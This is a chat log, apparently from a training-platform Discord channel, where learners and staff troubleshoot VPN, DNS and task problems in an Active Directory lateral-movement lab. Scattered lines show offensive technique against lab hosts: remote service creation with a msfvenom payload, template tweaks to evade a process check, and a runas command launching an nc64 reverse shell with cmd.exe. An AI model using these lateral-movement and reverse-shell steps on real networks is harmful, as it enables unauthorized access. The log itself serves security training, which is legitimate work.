Doing ExploitingAD now, and the VPN is not connected. Firefox, using AttackBox. I was able to do both Breaching AD and Enumerating AD earlier today without issue, now it's not connecting. Is there some sort of limit per day? Second day where working on this hits a stopping point from the VPN not functioning properly
@odd sequoia Please slow down. Further spam will result in a short timeout.
I cannot connect to the vpn is there a problem?
Anyone got any ideas why my service doesn't start at the end of task 3? I've tried several times now on different days using different filenames for the payload and different service names but it just doesn't want to start. I have tried copying and pasting the command line for creating the payload in msfvenom and typing it in manually just to make sure that's right and I can see the .exe in %windir%
```
C:\Windows\system32>sc.exe \thmiis.za.tryhackme.com create THMservice-4545 binPath= "%windir%\candyservice.exe" start= auto
sc.exe \thmiis.za.tryhackme.com create THMservice-4545 binPath= "%windir%\candyservice.exe" start= auto
[SC] CreateService SUCCESS
C:\Windows\system32>sc.exe \thmiis.za.tryhackme.com start THMservice-4545
sc.exe \thmiis.za.tryhackme.com start THMservice-4545
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
```
Ah, I managed to get it to start by creating a 64-bit payload instead.
I can't connect to the VPN. Somebody any idea what I can try?
@thick monolith try rebuilding any payloads as x64. That worked for me to start the service and get the connection but then it still wouldn't let me run the flag.exe
It's the VPN file of the Network
Hi @thick monolith, thank you for the Linux OpenVPN guide. I am currently working on Windows and I am unable to establish a VPN connection: the connection times out. Do you have any advice or Windows-specific considerations I should be aware of?
Thanks for the video. Strange that he gets the flag as local system when I'm connected as the same account via Metasploit via the malicious service. I can't see anything I did differently other than using a 64-bit payload. Maybe I'll just give it another try later in the week. Hope you manage to get somewhere with it.
Gave +1 Rep to @thick monolith (current: #1051 - 6)
I got it now. I had to regenerate the VPN a few times but now it works.
Gave +1 Rep to @thick monolith (current: #944 - 7)
I'm still stumped on the very end of Task 3. I can get all the way there following the guide (although I have to generate a 64-bit payload to get it to run) but I get the service running as Local System to connect back to my msfconsole, I run flag.exe and just always get "Sorry! You are still missing something. No flag for you yet. (7)"
Any advice?
Yes! Did you ever resolve it?
Hi, I have an issue where I want to connect to the VPN of the lateral movement and pivoting room but get this failed connection refused and restart. Even after redownloading a new OVPN file, it still persists. Is there any other step I missed?
For this issue, I had resolved it, thank you
Have you solved the problem? I too get the same problem now. I also needed a 64-bit payload to get it to run, and after all the shit this room made me debug through, now it's saying "Sorry! You are still missing something. No flag for you yet. (7)"
No, there didn't seem to be any support and I couldn't figure it out on my own (not that I should have to because it's not a CTF). Such a shame when this is supposed to be an educational platform and I pay money for it. Very disappointing. I wish you luck though. If you figure it out, please let me know.
After starting the malicious service, it runs under rundll32.exe which, according to ChatGPT, is checked by flag.txt, and flag.txt expects the structure
service.exe
__ malsvc.exe
__ cmd.exe
But the actual structure is
service.exe
__ malsvc.exe
__ rundll32.exe
__ cmd.exe
So we fail the check and get that error. I don't know if this is the actual reason; also walkthroughs run the same commands but don't get the error, why is that? I think because they are pretty old, when the environment was different from now, and with that previous environment in mind the flag could've been created; now the environment changed and the flag is failing. It is definitely not our fault. I wonder if it is the fault of msfvenom payload generation.
I solved the structure problem by modifying the msfvenom exe-service default template, removing the call of rundll32.exe and using that modified template as a custom template using option -x in msfvenom itself, and that made my service run directly under service.exe, removing the middleman rundll32.exe which was spawned by the msfconsole default template. Now I got another problem to solve. I don't know what I missed: "Sorry! You are still missing something. No flag for you yet. (6)". From 7 to 6, the numbers are decreasing.
Did you solve the problem?
This room is 100% bugged on Task 3.
Neither my own machine nor the attack box works.
My own machine can't resolve the name of the account in the runas command (for some reason?) and my attackbox simply doesn't want to accept the reverse shell at all with nc.
I followed the room step by step and nothing works.
Tried 3 different walkthroughs? Nothing.
Tried looking in here for hours and everyone is complaining about the DNS having issues, while in other networks I had no issues with that.
Am I missing something?
You solved your issue? If not, just move on. I wasted hours debugging with no good result. Get the flag from walkthroughs and you'll be fine.
Nope, didn't solve it, so I got the flag from a walkthrough since I had the whole process understood but not working, and went on my way.
This room is even more bugged now with the new attackbox.
anyone having trouble with DNS on mac os? tried to go Settings > Wi-Fi > my network > DNS, and appended at the end the IP of the domain controller. Yet, won't let me get the credentials. Tried also adding nameserver $THMDC_IP to /etc/resolver/za.tryhackme.com. Nothing again. Is it really bugged out?
Hey all,
I'm trying to complete this room, but it seems since a couple of days the network doesn't start at all for me anymore. Just stays in the loading state cycling through the different messages forever (I left it open for hours). Tried different days, different browsers, but didn't help. Also cannot click on Request Reset or anything since it's all blocked in the loading state.
Is anybody else seeing this?
It is the msfvenom payload, yes, but it's not rundll that's the problem. Finding another means to thread hijack solves this issue.
It's been five days trying to do the complex exploit in task 7 and it doesn't seem to be responsive, box may need to be reset
It was the wrong account:
za\t1_leonard.summers@THMJMP2 C:\Users\t1_leonard.summers>runas /netonly /user:za.tryhackme.com\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.150.74.11 7676"
@feral fern
Nope, I was wrong too.
The impersonation of t1_leonard.summers is only for remote, but nc64.exe is local. So, whoami doesn't help here. But you can test your elevated privs in the new reverse shell if you try with bradley.cook to access a resource he doesn't have access to: dir \\thmiis.za.tryhackme.com\admin$ you can see the share that only admins can see
Is this room broken? Half the time the given credentials don't work, and even when they do, I can't get to the flag. I've been spending full days on a task that's supposed to take 45 minutes
I try to complete these things "with honor" but I'm tempted to just plug in the flags from walkthroughs. I'm 96% of the way through the Pentest+ course and this room is the main thing keeping me from 100%
I need some help. I am stuck on the felicia dean part and I am about to swear at someone
first
but needing help in task 3 for the first rev shell with runas
it doesn't really give anything other than
That IP you used looked a bit wrong. Should it not be 10.50.61.1?
oh ffs
Can you run ifconfig? Just note I'm guessing here
yeah, it's me getting them mixed up
got it
mixed the 2 ips together
so the fix of the IP helped
Ah okay perfect! It was a shot in the dark but glad it worked out! Yeah so for reverse shells it should be that VPN IP which translates to the IP corresponding to the Gateway. For bind shells it will be the actual IP of the host which will correspond to the Destination of the route -n command
I need to move the note on how to select the right IP for revshells. Will do in a minute.
also for some reason we get access denied now
even though 5 minutes ago I was able to do it
What users are you running as on that terminal?
t1_leonard.summers
Mmm, t1 users should have full permissions on servers. Can you run dir \\thmiis.za.tryhackme.com\c$ and see if that works?
The network path was not found
Just check I made a typo, should be IIS, not ISS
"The user name or password is incorrect"
Ahh, so yeah, creds don't work
You sure you typed that password correctly for the runas command?
You can always verify creds by running dir \\za.tryhackme.com\sysvol
it doesn't go well for me today
That's the magic of the runas command if you run it with the /netonly flag. It was discussed in the Enumerating AD (Task 2) room. You can specify whatever creds you want, it won't test them against the domain. So great when it works, but yeah, you need to do a quick check on the creds with something like sysvol.
@shadow linden where is PsExec64.exe laying on the jmp2 since I can't find it in C:\windows\system32
It should be on c:\tools
thanks for the nice room @shadow linden
Gave +1 Rep to @shadow linden
though a little irritating you have to restart your DNS for every task, it happened for me
That's weird... Are you using the attackbox?
I'll take a look at that. Thx for the feedback.
You're welcome. Also giving a pointer that the psexec tool is in c:\tools can help some people.
I wanna say something
Last week I was doing your brand new windows privilege escalation room, which was revamped I guess,
It was so beautifully written, coordinated, I was happy reading them all and going through it, following up,
Passing by each task I felt accomplished and learnt a lot, it looked like straight out of the notes (if I had had to make them). I'm in love with it absolutely. I'm gonna do every other room by you soon. Especially the new one (lateral movement network).
Much love
I can't seem to download the ovpn config file for this network, I've tried leaving and rejoining the room and waited for a while but the the access page just gives a 404 not found error whenever I try to download it, any help would be appreciated.
Probably a good idea to give them the subnet you're on.
They seem to ask for it every time I think anyone has a 404 error.
the network is on 10.200.77.x , it just reset but no difference
Yeah, I'm on the same network and I can't download it either, 10.200.77.101
should be fixed @feral granite @toxic harness
yeah, it works + @frail ore
Gave +1 Rep to @frail ore
niiiiice
Have issue with accessing machines on the network, seems like vpn connection is good. Network is 10.200.78.X
what issue are you getting, can you ping 10.200.78.101?
can you send a screenshot of your ip a
and what the VPN is saying
Connectivity to the router is fine, let's just wait for the staff, no hurry, it's Sunday.
wait, have you joined multiple networks lately?
as in the latest windows networks
Maybe, I still have access to the "Enumerating-AD" network
I have experienced problems with routing because of joining multiple networks, try leaving the enumerating-ad
and then download a new vpn
Still doesn't work, thank you Bella for the effort
Thanks Ben.
Gave +1 Rep to @frail ore
I have lateral movement vpn active. Also green indicator at Access => Networks page but IP address of AD server can't be reached. Any suggestions?
What's your ip range?
10.50.78.3/24
And the servers ips?
10.200.79.0/24 .101 is THMDC
hmm @shadow linden
If you just started the network, give it a min or two. The DC is always the last to start
Thanks KillSwitch! Means a lot to me. Glad you liked it.
Gave +1 Rep to @high ridge
10.50.78.1 still gives destination host unreachable for 10.200.79.101 AD server but also the .201 and .249
I think something is wrong, the network has been up 35 minutes and still the servers of 10.200.79.0/24 accessible via the 10.50.78.1 gateway.
Will give it another try some other time.
Let me check that.
I still can't download the VPN, no rush though. A Regen fixed it.
is .71 the subnet number?
Just double-checking (: I've passed it on
I appreciate that, I had a 2nd confirmation that it isn't me.
I had to move the lines to double check the number now.
~~ I can't reach the servers. ~~ Never mind, the network wasn't started.
I'm quitting while I'm ahead.
Me too I seem not to be able to reach anything on the 10.200.80.0/24 net (network is started :))
What's your /etc/resolv.conf ?
I'm using attackbox
nameserver 127.0.0.53
options edns0
search eu-west-1.compute.internal
Change the nameserver to whatever your subnet is.
So if it's like mine, it will be 10.200.77.101
It should fix it.
root@kali:~/tryhackme/LateralWin# cat /etc/resolv.conf
# Generated by NetworkManager
search localdomain
nameserver 10.200.71.101
root@kali:~/tryhackme/LateralWin# cat /etc/systemd/resolved.conf
# This file is part of systemd.
#
# systemd is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Entries in this file show the compile time defaults. Local configuration
# should be created by either modifying this file, or by creating "drop-ins" in
# the resolved.conf.d/ subdirectory. The latter is generally recommended.
# Defaults can be restored by simply deleting this file and all drop-ins.
#
# Use 'systemd-analyze cat-config systemd/resolved.conf' to display the full config.
#
# See resolved.conf(5) for details.
[Resolve]
# Some examples of DNS servers which may be used for DNS= and FallbackDNS=:
# Cloudflare: 1.1.1.1#cloudflare-dns.com 1.0.0.1#cloudflare-dns.com 2606:4700:4700::1111#cloudflare-dns.com 2606:4700:4700::1001#cloudflare-dns.com
# Google: 8.8.8.8#dns.google 8.8.4.4#dns.google 2001:4860:4860::8888#dns.google 2001:4860:4860::8844#dns.google
# Quad9: 9.9.9.9#dns.quad9.net 149.112.112.112#dns.quad9.net 2620:fe::fe#dns.quad9.net 2620:fe::9#dns.quad9.net
DNS=10.200.71.101
#FallbackDNS=
#Domains=
#DNSSEC=no
#DNSOverTLS=no
#MulticastDNS=yes
#LLMNR=yes
#Cache=yes
#CacheFromLocalhost=no
#DNSStubListener=yes
#DNSStubListenerExtra=
#ReadEtcHosts=yes
#ResolveUnicastSingleLabel=no
already tried without success
dig thmdc.za.tryhackme.com @10.200.80.101 times out too
Please just run nmap -p 22,3389 10.200.<YourSubnet>.249 -Pn - If these ports are not open, something wrong with network
have you tried changing /etc/systemd/resolved.conf?
Ah forgot the -Pn
typical windows for blocking pings
root@kali:~/VPNHackMe# nmap -p 22,3389 10.200.71.249 -Pn -T5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 10:22 EDT
Nmap scan report for 10.200.71.249
Host is up.
PORT STATE SERVICE
22/tcp filtered ssh
3389/tcp filtered ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
nmap -p 22,3389 10.200.80.249 -Pn
Starting Nmap 7.60 ( https://nmap.org ) at 2022-06-26 15:22 BST
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 15:22 (0:00:00 remaining)
Nmap scan report for 10.200.80.249
Host is up.
PORT STATE SERVICE
22/tcp filtered ssh
3389/tcp filtered ms-wbt-server
It worked for me without -Pn
Yep, then there is a network issue there and I recommend a reset
Same here
subnet 89 works fine
I wish it was, lol.
Means the network should be running. Do you also have DNS issues?
Yes
10.200.80.xxx should work fine
With my VPN config?
probably not
I can setup a VPN for you
Mmm, that should not happen. Are you running on Kali or attackbox?
Kali (Own VM)
nvm, I am getting a 404 when downloading
already did
I'm launching a new attack box to see if something changes
fair fair, I used attackbox when going through the room
so didn't have a vpn going already
Nope, 10.200.80 net still unusable, maybe it can be reset (I'm vote 1/2)
I've reset it for you
Thank you @lost tinsel
Gave +1 Rep to @lost tinsel
give it like 10 minutes and it should be ready
Mmm that should work. It can sometimes create issues when you try to configure DNS in multiple ways. But perhaps quickly send me your VPN file and I'll test on my side
Perm to DM?
Yes pls, pls don't send the VPN file on the channel.
LoooL I didn't want to just jump in.
@rough snow looks like I couldn't help you anyway with the vpn as none of mine wants to download
I am on!
Hack the planet
then get on hacking!
^^
Thank you now it seems to work.
Gave +1 Rep to @lost tinsel
just remembered, I could just have gone to the attackbox and sent the VPN from there
+rep @frail ore
Gave +1 Rep to @frail ore
5min timer
Gave +1 Rep to @lost tinsel
Thank you
10.200.80 is resetting. There was an issue on our end. If you give it a couple of minutes (I'd say about 5 just to be safe) all should be resolved (:
already done did it and fixed it
Thank you all ok now
Gave +1 Rep to @frail ore
I was already in the same subnet so I could just give it a reset from there
In the 10.200.80.x network and getting error 404 downloading the VPN file same as you lot got, also launched AttackBox in the room and it wasn't connected to the network
Did you try and regen the vpn file?
Several times getting Error 404 for the network but I can regen my regular VPN file normally
Launched the AttackBox twice too and same result
the network wasn't started, try now
(don't know if that was why, I can see that your message is a bit old)
sorry to bother you again but 10.200.80 is experiencing same problem as before
thmjmp2 not reachable - for me too error 404 downloading the network config file. I'm also noticing that the attackbox does not have the vpn interface named as the network itself but a generic tun0
Can you try regenerating your ovpn file?
You mean my personal vpn file or the network one ?
the network one
still 404
We are checking this now. Should be fixed soon
thank you, there's no hurry, I can play tomorrow
Gave +1 Rep to @shadow linden
We rolled out a patch to all active servers. VPN should be working again just now. Just regen your VPN file please. Let me know if it still fails
still not able to connect to the lateralmovement network
Are you still getting a 404 error or something else?
no, I get this error from nslookup thmdc.za.tryhackme.com:
;; connection timed out; no servers could be reached
Okay, glad the 404 is sorted at least. Can you ping the DC?
nope ping 10.200.75.101
PING 10.200.75.101 (10.200.75.101) 56(84) bytes of data.
From 10.50.67.1 icmp_seq=1 Destination Host Unreachable
yes, the network is running, and no, I cannot ping the thmjmp2 IP either
Send me your VPN file please and I'll take a look
hummm, I do not seem to have an option to upload files
!docs verify
you'll have to verify your profile
Also please DM it directly to me. Don't send it on the channel
and that offer was for dms, I think
I have been a Subscriber for 2 years already verified
Not verify your email, verify your discord profile?
like I said, I have been a subscriber for 2 years
```
Kn1ght1995 - 04/20/2020
!verify a37xxxxxxxxxxxxx
TryHackMe
BOT
- 04/20/2020
Your level has been updated!
```
Try reverify
uggg, this network room wasn't put together very well before it was released, was it? I'm not able to connect to SMB on //thmiis.za.tryhackme.com/admin$, all I get is session setup failed: NT_STATUS_LOGON_FAILURE
With messages like that won't get support. The DNS issue I helped you with previously was the network not running, nothing more.
If I were in your shoes, since other users are able to complete the network without an issue, I would perhaps consider that I might be doing something wrong and constructively ask for help, providing as much detail as possible to have others assist you.
But if this is the way you ask for help (or just complain), I'm pretty sure you are on your own here.
As one of the creators of rooms, I'm open to taking constructive feedback and improving how we do things. Our networks are not perfect and we are constantly updating them and patching for edge cases which our rigorous QA process might have missed. But I don't think that that is a very constructive way to ask for assistance.
I'm not asking for help, I'm just stating my opinion. I feel that this network room was poorly put together
hello. my attackbox can't connect to / do nslookup on the DC and I just get a 404 error trying to download the VPN. not sure if it's the room or on my side. restarted the attackbox plus voted to get the whole room restarted. still doesn't work. not sure what to do
hey, have you tried to regenerate your VPN profile for this network?
oh yes forgot to add that. yes i did
Can you send me the subnet that is shown on your network diagram? Should be 10.200.X.0/24? I'm looking for the X there
tried again and now it downloaded lmao
Happiness! One thing to note: users are allocated to the network and once a current network is filled up, it boots an additional network. That new network takes a bit of time to become live, so sometimes a bit more time might do the trick if you were the unlucky (or lucky, since no one else is currently on it) first person in the next network
oh oki sounds good. i write again if i still have some problems
seems to work now. and i even for the first time succeeded to fix and setup with the dns on my own machine so i dont need to use the attackbox
Glad to hear it, good luck with the room!
thank you and good luck with the supporting
Gave +1 Rep to @rose kernel
Thank you: just to let you know that the VPN issue is solved now. Still having issues with name resolution but hopefully I'm at the last task
Gave +1 Rep to @rose kernel
Awesome! Thanks for letting me know. A quick trick with name resolution is to specify the DC IP with the nslookup command. So say for instance your THMDC IP is 10.200.24.101, you can run:
nslookup za.tryhackme.com 10.200.24.101
Remember to replace 24 with whatever your subnet on your network diagram is. If this command works, it means the DNS in the network is actually working, the issue is still on your client side (kali or attackbox) that needs to be fixed. If that command does not work, there might be an issue in the network.
Gave +1 Rep to @cerulean ridge
Thank you @shadow linden @rose kernel and @frail ore for assistance even on Sunday. Network done
Gave +1 Rep to @shadow linden
I am getting this error when I try nslookup thmdc.za.tryhackme.com:
;; connection timed out; no servers could be reached
I have verified that my VPN connects to the network by using "ip a". I have also made sure that the network is started and my DNS on the Kali VM is set to the THMDC, and I have restarted NetworkManager. I tried the "nslookup za.tryhackme.com 10.200.86.101" command and got the same error ";; connection timed out; no servers could be reached"
I now kinda get the same thing
kinda?
or I have the same issue altogether
nslookup thmdc.za.tryhackme.com
;; connection timed out; no servers could be reached
same on the attackbox
yepp
it's back as before a bit
can't connect to or do nslookup on the DC from my machine or the attackbox
I fixed it by voting to reset the network; now it is working